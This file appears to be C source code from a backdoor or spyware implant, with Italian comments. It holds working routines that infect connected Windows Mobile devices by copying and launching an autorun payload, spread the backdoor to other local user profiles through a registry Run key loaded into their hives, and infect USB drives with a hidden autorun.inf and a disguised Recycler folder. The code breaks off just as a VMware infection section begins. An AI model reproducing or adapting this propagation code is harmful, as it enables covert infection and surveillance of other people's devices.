HM_PDAAgent.h
#define SPREAD_AGENT_SLEEP_TIME 2*60*60*1000 // Ogni 2 ore
#define PDA_AGENT_SLEEP_TIME 30000 // Ogni 30 secondi controlla il PDA
#define USB_AGENT_SLEEP_TIME 2000 // Ogni 2 secondi controlla l'USB
#define VMW_AGENT_SLEEP_TIME 10*60*1000 // Ogni 10 minuti controlla le VM
BOOL bPM_PDAAgentStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
BOOL bPM_pdacp = FALSE; // Semaforo per l'uscita del thread per pda
BOOL bPM_sprcp = FALSE; // Semaforo per l'uscita del thread per spread
BOOL bPM_usbcp = FALSE; // Semafoto per l'uscita del thread per usb
BOOL bPM_vmwcp = FALSE; // Semafoto per l'uscita del thread per vm
HANDLE hPDAThread = NULL;
HANDLE hSpreadThread = NULL;
HANDLE hUSBThread = NULL;
HANDLE hVMWThread = NULL;
BOOL infection_spread = FALSE; // Deve fare spread?
BOOL infection_pda = FALSE; // Deve infettare i telefoni?
BOOL infection_usb = FALSE; // Deve infettare le USB?
BOOL infection_vm = FALSE; // Deve infettare le VM?
BOOL one_user_infected = FALSE; // Infetta solo un utente in una run
DWORD vm_delay = VMW_AGENT_SLEEP_TIME; // Delay per il loop di polling sulle VM
extern void SM_AddExecutedProcess(DWORD);
typedef struct _RAPIINIT {
DWORD cbSize;
HANDLE heRapiInit;
HRESULT hrRapiInit;
} RAPIINIT;
typedef struct _CE_FIND_DATA {
DWORD dwFileAttributes;
FILETIME ftCreationTime;
FILETIME ftLastAccessTime;
FILETIME ftLastWriteTime;
DWORD nFileSizeHigh;
DWORD nFileSizeLow;
DWORD dwOID;
WCHAR cFileName[MAX_PATH];
} CE_FIND_DATA, *LPCE_FIND_DATA;
typedef HRESULT (WINAPI *CeRapiInitEx_t) (RAPIINIT *);
typedef HRESULT (WINAPI *CeRapiUninit_t)(void);
typedef HANDLE (WINAPI *CeCreateFile_t)(LPCWSTR,DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef BOOL (WINAPI *CeWriteFile_t)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL (WINAPI *CeReadFile_t)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL (WINAPI *CeCloseHandle_t)(HANDLE);
typedef BOOL (WINAPI *CeCreateDirectory_t)(LPCWSTR, LPSECURITY_ATTRIBUTES);
typedef HANDLE (WINAPI *CeFindFirstFile_t)(LPCWSTR, LPCE_FIND_DATA);
typedef BOOL (WINAPI *CeFindNextFile_t)(HANDLE, LPCE_FIND_DATA);
typedef BOOL (WINAPI *CeDeleteFile_t)(LPCWSTR);
typedef BOOL (WINAPI *CeCreateProcess_t)(LPCWSTR, LPCWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
typedef BOOL (WINAPI *CeFindClose_t)(HANDLE);
CeFindFirstFile_t pCeFindFirstFile = NULL;
CeFindNextFile_t pCeFindNextFile = NULL;
CeRapiUninit_t pCeRapiUninit = NULL;
CeRapiInitEx_t pCeRapiInitEx = NULL;
CeCreateFile_t pCeCreateFile = NULL;
CeWriteFile_t pCeWriteFile = NULL;
CeReadFile_t pCeReadFile = NULL;
CeCloseHandle_t pCeCloseHandle = NULL;
CeCreateDirectory_t pCeCreateDirectory = NULL;
CeDeleteFile_t pCeDeleteFile = NULL;
CeCreateProcess_t pCeCreateProcess = NULL;
CeFindClose_t pCeFindClose = NULL;
extern void SetLoadKeyPrivs();
#define PDA_LOG_DIR L"$MS313Mobile"
#define AUTORUN_BACKUP_NAME L"Autorun4.exe"
#define CONFIG_FILE_NAME L"cptm511.dql"
#define HIVE_MOUNT_POINT L"-00691\\"
#define MAX_USER_INFECTION_COUNT 250
///////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////// Infezione Mobile //////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////
BOOL RapiInit()
{
static BOOL rapi_init = FALSE;
HMODULE hrapi;
if (rapi_init)
return TRUE;
if (!(hrapi = LoadLibraryW(L"rapi.dll")))
return FALSE;
pCeWriteFile = (CeWriteFile_t)GetProcAddress(hrapi, "CeWriteFile");
pCeReadFile = (CeReadFile_t)GetProcAddress(hrapi, "CeReadFile");
pCeRapiInitEx = (CeRapiInitEx_t)GetProcAddress(hrapi, "CeRapiInitEx");
pCeRapiUninit = (CeRapiUninit_t)GetProcAddress(hrapi, "CeRapiUninit");
pCeCreateFile = (CeCreateFile_t)GetProcAddress(hrapi, "CeCreateFile");
pCeCloseHandle = (CeCloseHandle_t)GetProcAddress(hrapi, "CeCloseHandle");
pCeCreateDirectory = (CeCreateDirectory_t)GetProcAddress(hrapi, "CeCreateDirectory");
pCeFindFirstFile = (CeFindFirstFile_t)GetProcAddress(hrapi, "CeFindFirstFile");
pCeFindNextFile = (CeFindNextFile_t)GetProcAddress(hrapi, "CeFindNextFile");
pCeDeleteFile = (CeDeleteFile_t)GetProcAddress(hrapi, "CeDeleteFile");
pCeCreateProcess = (CeCreateProcess_t)GetProcAddress(hrapi, "CeCreateProcess");
pCeFindClose = (CeFindClose_t)GetProcAddress(hrapi, "CeFindClose");
if (!pCeWriteFile || !pCeReadFile || !pCeRapiInitEx || !pCeRapiUninit || !pCeCreateFile || !pCeCreateProcess ||
!pCeCloseHandle || !pCeCreateDirectory || !pCeFindFirstFile || !pCeFindNextFile || !pCeDeleteFile || !pCeFindClose) {
FreeLibrary(hrapi);
return FALSE;
}
rapi_init = TRUE;
return TRUE;
}
#define RAPI_CONNECT_SLEEP_TIME 300
BOOL TryRapiConnect(DWORD dwTimeOut)
{
HRESULT hr = E_FAIL;
RAPIINIT riCopy;
DWORD dwRapiInit = 0;
DWORD count;
ZeroMemory(&riCopy, sizeof(riCopy));
riCopy.cbSize = sizeof(riCopy);
hr = pCeRapiInitEx(&riCopy);
if (!SUCCEEDED(hr))
return FALSE;
for (count=0; count<dwTimeOut; count+=RAPI_CONNECT_SLEEP_TIME) {
if (bPM_pdacp)
break;
dwRapiInit = FNC(WaitForSingleObject)(riCopy.heRapiInit, RAPI_CONNECT_SLEEP_TIME);
if (WAIT_OBJECT_0 == dwRapiInit) {
if (SUCCEEDED(riCopy.hrRapiInit))
return TRUE;
}
}
pCeRapiUninit();
return FALSE;
}
void RapiDisconnect()
{
pCeRapiUninit();
}
BOOL FindMemoryCard(WCHAR *mmc_name, DWORD len_in_word)
{
CE_FIND_DATA cefd;
HANDLE hfind;
hfind = pCeFindFirstFile(L"*", &cefd);
if (hfind == INVALID_HANDLE_VALUE)
return FALSE;
do {
if ((cefd.dwFileAttributes & FILE_ATTRIBUTE_TEMPORARY) &&
(cefd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
_snwprintf_s(mmc_name, len_in_word, _TRUNCATE, L"%s", cefd.cFileName);
pCeFindClose(hfind);
return TRUE;
}
} while (pCeFindNextFile(hfind, &cefd));
pCeFindClose(hfind);
return FALSE;
}
BOOL CopyFileToPDAFromPC(char *source, WCHAR *dest)
{
BYTE buffer[2048];
DWORD nread, nwrite;
HANDLE hdst, hsrc;
hsrc = CreateFileA(source, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
if (hsrc == INVALID_HANDLE_VALUE)
return FALSE;
hdst = pCeCreateFile(dest, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NULL, NULL);
if (hdst == INVALID_HANDLE_VALUE) {
CloseHandle(hsrc);
return FALSE;
}
while (FNC(ReadFile)(hsrc, buffer, sizeof(buffer), &nread, NULL) && nread>0)
pCeWriteFile(hdst, buffer, nread, &nwrite, NULL);
CloseHandle(hsrc);
pCeCloseHandle(hdst);
return TRUE;
}
BOOL CopyFileToPDAFromPDA(WCHAR *source, WCHAR *dest)
{
BYTE buffer[2048];
DWORD nread, nwrite;
HANDLE hdst, hsrc;
hsrc = pCeCreateFile(source, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
if (hsrc == INVALID_HANDLE_VALUE)
return FALSE;
hdst = pCeCreateFile(dest, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NULL, NULL);
if (hdst == INVALID_HANDLE_VALUE) {
pCeCloseHandle(hsrc);
return FALSE;
}
while (pCeReadFile(hsrc, buffer, sizeof(buffer), &nread, NULL) && nread>0)
pCeWriteFile(hdst, buffer, nread, &nwrite, NULL);
pCeCloseHandle(hsrc);
pCeCloseHandle(hdst);
return TRUE;
}
BOOL PDAFilesPresent()
{
HANDLE hfile;
char check_path[_MAX_PATH];
hfile = FNC(CreateFileA)(HM_CompletePath(H4_MOBCORE_NAME, check_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
hfile = FNC(CreateFileA)(HM_CompletePath(H4_MOBZOO_NAME, check_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
return TRUE;
}
BOOL BBFilesPresent()
{
HANDLE hfile;
char check_path[_MAX_PATH];
/*
hfile = FNC(CreateFileA)(HM_CompletePath(BB_INSTALL_NAME1, check_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
hfile = FNC(CreateFileA)(HM_CompletePath(BB_INSTALL_NAME2, check_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
return TRUE;*/
return FALSE;
}
BOOL IsPDAInfected(WCHAR *mmc_path)
{
WCHAR check_name[MAX_PATH];
CE_FIND_DATA cefd;
HANDLE hfind;
// Prima controlla se la backdoor gia' gira
_snwprintf_s(check_name, MAX_PATH, _TRUNCATE, L"\\Windows\\%s\\%s", PDA_LOG_DIR, CONFIG_FILE_NAME);
hfind = pCeCreateFile(check_name, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfind != INVALID_HANDLE_VALUE) {
pCeCloseHandle(hfind);
return TRUE;
}
// Poi controlla se non abbiamo gia' scritto il nostro autorun sulla MMC
_snwprintf_s(check_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\autorun.zoo", mmc_path);
hfind = pCeCreateFile(check_name, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfind != INVALID_HANDLE_VALUE) {
pCeCloseHandle(hfind);
return TRUE;
}
return FALSE;
}
BOOL InfectPDA(WCHAR *mmc_path)
{
char source_name[_MAX_PATH];
WCHAR check_name[MAX_PATH], dest_name[MAX_PATH];
HANDLE hfile;
PROCESS_INFORMATION pi;
// Controlla se c'e' un autorun da copiare
_snwprintf_s(check_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\autorun.exe", mmc_path);
hfile = pCeCreateFile(check_name, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile != INVALID_HANDLE_VALUE) {
pCeCloseHandle(hfile);
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\%s", mmc_path, AUTORUN_BACKUP_NAME);
if (!CopyFileToPDAFromPDA(check_name, dest_name))
return FALSE;
}
// Crea la directory se gia' non c'e'
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577", mmc_path);
pCeCreateDirectory(dest_name, NULL);
// Copia lo zoo
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\autorun.zoo", mmc_path);
if (!CopyFileToPDAFromPC(HM_CompletePath(H4_MOBZOO_NAME, source_name), dest_name)) {
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\%s", mmc_path, AUTORUN_BACKUP_NAME);
pCeDeleteFile(dest_name);
return FALSE;
}
// Copia l'exe
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\autorun.exe", mmc_path);
if (!CopyFileToPDAFromPC(HM_CompletePath(H4_MOBCORE_NAME, source_name), dest_name)) {
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\%s", mmc_path, AUTORUN_BACKUP_NAME);
pCeDeleteFile(dest_name);
_snwprintf_s(dest_name, MAX_PATH, _TRUNCATE, L"\\%s\\2577\\autorun.zoo", mmc_path);
pCeDeleteFile(dest_name);
return FALSE;
}
// Cerca di lanciare l'exe
pCeCreateProcess(dest_name, NULL, NULL, NULL, FALSE, 0, NULL, NULL, NULL, &pi);
return TRUE;
}
/////////////////////////////////////////////////////////////////////////////
///////////////////////// Infezione Utenti //////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
void ReadRegValue(HKEY hive, WCHAR *subkey, WCHAR *value, DWORD *type, WCHAR **buffer)
{
DWORD size = NULL;
HKEY hreg;
if (type)
*type = 0;
if (buffer)
*buffer = NULL;
if (FNC(RegOpenKeyW)(hive, subkey, &hreg) != ERROR_SUCCESS)
return;
if (FNC(RegQueryValueExW)(hreg, value, NULL, type, NULL, &size) != ERROR_SUCCESS) {
FNC(RegCloseKey)(hreg);
return;
}
if (!buffer) {
FNC(RegCloseKey)(hreg);
return;
}
*buffer = (WCHAR *)calloc(size+2, 1);
if (!(*buffer)) {
FNC(RegCloseKey)(hreg);
return;
}
if (FNC(RegQueryValueExW)(hreg, value, NULL, type, (LPBYTE)(*buffer), &size) != ERROR_SUCCESS) {
FNC(RegCloseKey)(hreg);
SAFE_FREE((*buffer));
return;
}
FNC(RegCloseKey)(hreg);
}
BOOL RegEnumSubKey(HKEY hive, WCHAR *subkey, DWORD index, WCHAR **buffer)
{
BOOL ret_val = FALSE;
WCHAR temp_buff[1024];
DWORD size = NULL;
*buffer = NULL;
HKEY hreg = NULL;
do {
if (FNC(RegOpenKeyW)(hive, subkey, &hreg) != ERROR_SUCCESS)
break;
memset(temp_buff, 0, sizeof(temp_buff));
if (FNC(RegEnumKeyW)(hreg, index, temp_buff, (sizeof(temp_buff)/sizeof(temp_buff[0]))-1) != ERROR_SUCCESS)
break;
if ( ! ( (*buffer) = (WCHAR *)calloc(wcslen(temp_buff)*2+2, sizeof(WCHAR)) ) )
break;
swprintf_s((*buffer), wcslen(temp_buff)+1, L"%s", temp_buff);
ret_val = TRUE;
} while(0);
if (hreg)
FNC(RegCloseKey)(hreg);
return ret_val;
}
BOOL IsUserInfected(WCHAR *dest_dir)
{
HANDLE hfile;
WCHAR infection_path[MAX_PATH];
WIN32_FIND_DATAW fdw;
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4_CONF_FILE);
hfile = FNC(FindFirstFileW)(infection_path, &fdw);
if (hfile != INVALID_HANDLE_VALUE) {
FNC(FindClose)(hfile);
return TRUE;
}
return FALSE;
}
void RollBackUser(WCHAR *dest_dir)
{
WCHAR infection_path[MAX_PATH];
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4DLLNAME);
FNC(DeleteFileW)(infection_path);
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4_CONF_FILE);
FNC(SetFileAttributesW)(infection_path, FILE_ATTRIBUTE_NORMAL);
FNC(DeleteFileW)(infection_path);
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S", dest_dir, H4_HOME_DIR);
FNC(RemoveDirectoryW)(infection_path);
}
BOOL InfectRegistry(WCHAR *dest_dir, WCHAR *home_dir, WCHAR *user_sid)
{
WCHAR lc_key[MAX_PATH], uc_key[MAX_PATH], tmp_buf[MAX_PATH*2], hive_mp[MAX_PATH];
HKEY hOpen;
_snwprintf_s(tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]), _TRUNCATE, L"%s\\NTUSER.DAT", home_dir);
_snwprintf_s(hive_mp, sizeof(hive_mp)/sizeof(hive_mp[0]), _TRUNCATE, L"%s%s", user_sid, HIVE_MOUNT_POINT);
if (FNC(RegLoadKeyW)(HKEY_LOCAL_MACHINE, hive_mp, tmp_buf) != ERROR_SUCCESS)
return FALSE;
#ifdef RUN_ONCE_KEY
_snwprintf_s(lc_key, MAX_PATH, _TRUNCATE, L"%sSoftware\\Microsoft\\Windows\\CurrentVersion\\Runonce", hive_mp);
_snwprintf_s(uc_key, MAX_PATH, _TRUNCATE, L"%sSoftware\\Microsoft\\Windows\\CurrentVersion\\RunOnce", hive_mp);
#else
// XXX-NEWREG
_snwprintf_s(lc_key, MAX_PATH, _TRUNCATE, L"%sSoftware\\Microsoft\\Windows\\CurrentVersion\\Run", hive_mp);
_snwprintf_s(uc_key, MAX_PATH, _TRUNCATE, L"%sSoftware\\Microsoft\\Windows\\CurrentVersion\\Run", hive_mp);
#endif
if (FNC(RegOpenKeyW)(HKEY_LOCAL_MACHINE, uc_key, &hOpen) != ERROR_SUCCESS &&
FNC(RegOpenKeyW)(HKEY_LOCAL_MACHINE, lc_key, &hOpen) != ERROR_SUCCESS &&
FNC(RegCreateKeyW)(HKEY_LOCAL_MACHINE, uc_key, &hOpen) != ERROR_SUCCESS) {
FNC(RegUnLoadKeyW)(HKEY_LOCAL_MACHINE, hive_mp);
return FALSE;
}
// Path a rundll32.exe
_snwprintf_s(tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]), _TRUNCATE, L"%%SystemRoot%%\\system32\\rundll32.exe \"%s\\%S\\%S\",%S", dest_dir, H4_HOME_DIR, H4DLLNAME, "PPPFTBBP08");
_snwprintf_s(uc_key, sizeof(uc_key)/sizeof(uc_key[0]), _TRUNCATE, L"%S", REGISTRY_KEY_NAME);
if (FNC(RegSetValueExW)(hOpen, uc_key, NULL, REG_EXPAND_SZ, (BYTE *)tmp_buf, (wcslen(tmp_buf)+1)*sizeof(WCHAR)) != ERROR_SUCCESS) {
FNC(RegCloseKey)(hOpen);
FNC(RegUnLoadKeyW)(HKEY_LOCAL_MACHINE, hive_mp);
return FALSE;
}
FNC(RegCloseKey)(hOpen);
FNC(RegUnLoadKeyW)(HKEY_LOCAL_MACHINE, hive_mp);
return TRUE;
}
BOOL SpreadToUser(WCHAR *dest_dir, WCHAR *home_dir, WCHAR *user_sid)
{
char temp_path[MAX_PATH];
char *drv_scramb_name;
WCHAR infection_path[MAX_PATH];
WCHAR source_path[MAX_PATH];
if (!dest_dir)
return FALSE;
if (IsUserInfected(dest_dir))
return FALSE;
FNC(CreateDirectoryW)(dest_dir, NULL);
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S", dest_dir, H4_HOME_DIR);
FNC(CreateDirectoryW)(infection_path, NULL);
_snwprintf_s(source_path, MAX_PATH, _TRUNCATE, L"%S", HM_CompletePath(H4DLLNAME, temp_path));
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4DLLNAME);
if (!FNC(CopyFileW)(source_path, infection_path, FALSE)) {
RollBackUser(dest_dir);
return FALSE;
}
_snwprintf_s(source_path, MAX_PATH, _TRUNCATE, L"%S", HM_CompletePath(H4_CONF_FILE, temp_path));
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4_CONF_FILE);
if (!FNC(CopyFileW)(source_path, infection_path, FALSE)) {
RollBackUser(dest_dir);
return FALSE;
}
if (!InfectRegistry(dest_dir, home_dir, user_sid)) {
RollBackUser(dest_dir);
return FALSE;
}
// Cerca di copiare il driver (se c'e')
if (drv_scramb_name = LOG_ScrambleName(H4_DUMMY_NAME, 1, TRUE)) {
_snwprintf_s(source_path, MAX_PATH, _TRUNCATE, L"%S", HM_CompletePath(drv_scramb_name, temp_path));
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, drv_scramb_name);
FNC(CopyFileW)(source_path, infection_path, FALSE);
SAFE_FREE(drv_scramb_name);
}
// Cerca di copiare il codec (se c'e')
_snwprintf_s(source_path, MAX_PATH, _TRUNCATE, L"%S", HM_CompletePath(H4_CODEC_NAME, temp_path));
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H4_CODEC_NAME);
FNC(CopyFileW)(source_path, infection_path, FALSE);
// Cerca di copiare la dll 64 (se c'e')
_snwprintf_s(source_path, MAX_PATH, _TRUNCATE, L"%S", HM_CompletePath(H64DLL_NAME, temp_path));
_snwprintf_s(infection_path, MAX_PATH, _TRUNCATE, L"%s\\%S\\%S", dest_dir, H4_HOME_DIR, H64DLL_NAME);
FNC(CopyFileW)(source_path, infection_path, FALSE);
return TRUE;
}
WCHAR *GetLocalSettings(WCHAR *tmp_dir, char *curr_home)
{
WCHAR *temp_string, *ptr = NULL;
char *ptr2 = NULL;
static WCHAR ret_string[MAX_PATH];
DWORD len;
ZeroMemory(ret_string, sizeof(ret_string));
temp_string = _wcsdup(tmp_dir);
if (!temp_string)
return ret_string;
if (ptr = wcschr(temp_string, L'\\')) {
ptr++;
if (ptr = wcschr(ptr, L'\\')) {
ptr++;
if (ptr = wcschr(ptr, L'\\')) {
ptr++;
*ptr = 0;
}
}
}
if (ptr2 = strchr(curr_home, '\\')) {
ptr2++;
if (ptr2 = strchr(ptr2, '\\')) {
ptr2++;
if (ptr2 = strchr(ptr2, '\\'))
ptr2++;
}
}
if (ptr && ptr2) {
_snwprintf_s(ret_string, MAX_PATH, _TRUNCATE, L"%s%S", temp_string, ptr2);
len = wcslen(ret_string);
if (len>0) {
if (ret_string[len-1] == L'\\')
ret_string[len-1] = 0;
ptr = wcsrchr(ret_string, L'\\');
if (ptr)
*ptr = 0;
}
}
SAFE_FREE(temp_string);
return ret_string;
}
void InfectUsers()
{
WCHAR tmp_buf[512];
WCHAR *user_sid = NULL;
WCHAR *user_home = NULL;
WCHAR *user_temp = NULL;
WCHAR *temp_home = NULL;
WCHAR *tmp_ptr = NULL;
WCHAR *user_name = NULL;
DWORD i;
for (i=0;;i++) {
// Infetta un solo utente in una run
if (one_user_infected)
break;
// Cicla i profili (tramite i sid)
if (!RegEnumSubKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\", i, &user_sid))
break;
// E' un utente di sistema
if (wcsncmp(user_sid, L"S-1-5-21-", wcslen(L"S-1-5-21-"))) {
SAFE_FREE(user_sid);
continue;
}
// Prende la home
_snwprintf_s(tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]), _TRUNCATE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\%s\\", user_sid);
ReadRegValue(HKEY_LOCAL_MACHINE, tmp_buf, L"ProfileImagePath", NULL, &user_home);
if (!user_home) {
SAFE_FREE(user_sid);
continue;
}
ZeroMemory(tmp_buf, sizeof(tmp_buf));
FNC(ExpandEnvironmentStringsW)(user_home, tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]));
SAFE_FREE(user_home);
if (! (user_home = wcsdup(tmp_buf)) ) {
SAFE_FREE(user_sid);
continue;
}
// Prende la Temp
ReadRegValue(HKEY_CURRENT_USER, L"Environment\\", L"TEMP", NULL, &temp_home);
if (!temp_home) {
ReadRegValue(HKEY_CURRENT_USER, L"Environment\\", L"TMP", NULL, &temp_home);
if (!temp_home) {
SAFE_FREE(user_sid);
SAFE_FREE(user_home);
continue;
}
}
if (!(tmp_ptr = wcschr(temp_home, L'\\')) || !(user_temp = _wcsdup(tmp_ptr))) {
SAFE_FREE(user_sid);
SAFE_FREE(temp_home);
SAFE_FREE(user_home);
continue;
}
_snwprintf_s(tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]), _TRUNCATE, L"%s%s", user_home, user_temp);
tmp_ptr = GetLocalSettings(tmp_buf, H4_HOME_PATH); // Ricava la directory dove dropparsi
if (tmp_ptr[0] && SpreadToUser(tmp_ptr, user_home, user_sid)) {
if ( user_name = wcsrchr(user_home, L'\\') ) {
user_name++;
_snwprintf_s(tmp_buf, sizeof(tmp_buf)/sizeof(tmp_buf[0]), _TRUNCATE, L"[Inf. Module]: Spread to %s", user_name);
SendStatusLog(tmp_buf);
}
one_user_infected = TRUE;
}
//SAFE_FREE(tmp_ptr);
SAFE_FREE(user_sid);
SAFE_FREE(temp_home);
SAFE_FREE(user_home);
SAFE_FREE(user_temp);
}
}
////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////// Infezione USB //////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////
BOOL IsUSBInfected(WCHAR *drive_letter)
{
WCHAR file_path[MAX_PATH];
HANDLE hfile;
_snwprintf_s(file_path, MAX_PATH, _TRUNCATE, L"%s\\autorun.inf", drive_letter);
hfile = CreateFileW(file_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
return TRUE;
}
#define LOCALIZED_USB_AUTORUN "Open folder to view files"
#define LOCALIZED_USB_RECYCLE "Recycler"
#define LOCALIZED_USB_SID "S-1-5-21-4125489612-33920608401-12510794-1000"
#define DESKTOP_INI_STRING "[.ShellClassInfo]\r\nIconResource=%systemroot%\\system32\\SHELL32.dll,32\r\nIconFile=%systemRoot%\\system32\\SHELL32.dll\r\nIconIndex=32"
BOOL InfectUSB(WCHAR *drive_letter, char *rcs_name)
{
char autorun_format[]="[Autorun]\r\nAction=%s\r\nIcon=%%systemroot%%\\system32\\shell32.dll,4\r\nShellexecute=.\\%s\\%s\\%s.exe";
char autorun_string[512];
WCHAR file_path[MAX_PATH];
WCHAR recycle_path[MAX_PATH];
WCHAR sid_path[MAX_PATH];
WCHAR dini_path[MAX_PATH];
char exe_file[MAX_PATH];
char bd_path[MAX_PATH];
HANDLE hfile;
DWORD dummy;
// Verifica che esista il file della backdoor
HM_CompletePath(rcs_name, bd_path);
hfile = CreateFile(bd_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
// Crea il file di autorun
_snwprintf_s(file_path, MAX_PATH, _TRUNCATE, L"%s\\autorun.inf", drive_letter);
hfile = CreateFileW(file_path, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
_snprintf_s(autorun_string, sizeof(autorun_string), _TRUNCATE, autorun_format, LOCALIZED_USB_AUTORUN, LOCALIZED_USB_RECYCLE, LOCALIZED_USB_SID, rcs_name);
WriteFile(hfile, autorun_string, strlen(autorun_string), &dummy, NULL);
CloseHandle(hfile);
SetFileAttributesW(file_path, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
// Crea la RecycleBin
_snwprintf_s(recycle_path, MAX_PATH, _TRUNCATE, L"%s\\%S", drive_letter, LOCALIZED_USB_RECYCLE);
CreateDirectoryW(recycle_path, NULL);
SetFileAttributesW(recycle_path, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
_snwprintf_s(dini_path, MAX_PATH, _TRUNCATE, L"%s\\desktop.ini", recycle_path);
hfile = CreateFileW(dini_path, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, NULL, NULL);
if (hfile != INVALID_HANDLE_VALUE) {
WriteFile(hfile, DESKTOP_INI_STRING, strlen(DESKTOP_INI_STRING), &dummy, NULL);
CloseHandle(hfile);
}
SetFileAttributesW(dini_path, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
// Crea il subfolder e ci copia il file
_snwprintf_s(sid_path, MAX_PATH, _TRUNCATE, L"%s\\%S", recycle_path, LOCALIZED_USB_SID);
CreateDirectoryW(sid_path, NULL);
// ... e ci copia il file
_snprintf_s(exe_file, sizeof(exe_file), _TRUNCATE, "%S\\%s.exe", sid_path, rcs_name);
if (!CopyFile(bd_path, exe_file, FALSE)) {
// Se non riesce a scrivere il file cancella tutto quello creato
RemoveDirectoryW(sid_path);
SetFileAttributesW(dini_path, FILE_ATTRIBUTE_NORMAL);
DeleteFileW(dini_path);
SetFileAttributesW(recycle_path, FILE_ATTRIBUTE_NORMAL);
RemoveDirectoryW(recycle_path);
SetFileAttributesW(file_path, FILE_ATTRIBUTE_NORMAL);
DeleteFileW(file_path);
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////// Infezione VMWare /////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////
struct _ioctl_vstor
{
unsigned short len;
unsigned short dummy0;
unsigned long dw1;
unsigned long dw2;
unsigned long dw3;
unsigned long dw4;
unsigned long dw5;
unsigned long dw6;
unsigned char Path[MAX_PATH];
unsigned char extra[4];
};
